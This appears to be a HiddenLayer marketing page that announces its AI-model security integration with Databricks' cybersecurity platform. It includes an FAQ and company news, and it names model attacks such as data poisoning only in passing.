Cybersecurity and AI are now inseparable. Modern defenses rely heavily on machine learning models, but that also introduces new attack surfaces. Models can be compromised through adversarial inputs, data poisoning, or theft. These attacks can result in missed fraud detection, compliance failures, and disrupted operations.

Until now, data platforms and security tools have operated mainly in silos, creating complexity and risk.

The Databricks Data Intelligence Platform for Cybersecurity is a unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.

How HiddenLayer Secures AI Applications Inside Databricks

HiddenLayer adds the critical layer of security for AI models themselves. Our technology scans and monitors machine learning models for vulnerabilities, detects adversarial manipulation, and ensures models remain trustworthy throughout their lifecycle.

By integrating with Databricks Unity Catalog, we make AI application security seamless, auditable, and compliant with emerging governance requirements. This empowers organizations to demonstrate due diligence while accelerating the safe adoption of AI.

The Future of Secure AI Adoption with Databricks and HiddenLayer

The Databricks Data Intelligence Platform for Cybersecurity marks a turning point in how organizations must approach the intersection of AI, data, and defense. HiddenLayer ensures the AI applications at the heart of these systems remain safe, auditable, and resilient against attack.

As adversaries grow more sophisticated and regulators demand greater transparency, securing AI is an immediate necessity. By embedding HiddenLayer directly into the Databricks ecosystem, enterprises gain the assurance that they can innovate with AI while maintaining trust, compliance, and control.

In short, the future of cybersecurity will not be built solely on data or AI, but on the secure integration of both. Together, Databricks and HiddenLayer are making that future possible.

FAQ: Databricks and HiddenLayer AI Security

What is the Databricks Data Intelligence Platform for Cybersecurity?
The Databricks Data Intelligence Platform for Cybersecurity delivers the only unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.

Why is AI application security important?
AI applications and their underlying models can be attacked through adversarial inputs, data poisoning, or theft. Securing models reduces risks of fraud, compliance violations, and operational disruption.

How does HiddenLayer integrate with Databricks?
HiddenLayer integrates with Databricks Unity Catalog to scan models for vulnerabilities, monitor for adversarial manipulation, and ensure compliance with AI governance requirements.

Thanks for your message!

We will reach back to you as soon as possible.

Oops! Something went wrong while submitting the form.

Advancing the Science of AI Security

Turning Discovery Into Defense

Our AI Security Research Team

Kenneth Yeung

Conor McCauley

Jim Simpson

Jason Martin

Andrew Davis

Marta Janus

Eoin Wickens

Kieran Evans

Ryan Tracey

Kasimir Schulz

Our Impact by the Numbers

Latest Discoveries

In the News

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

Get all our Latest Research & Insights

Thanks for your message!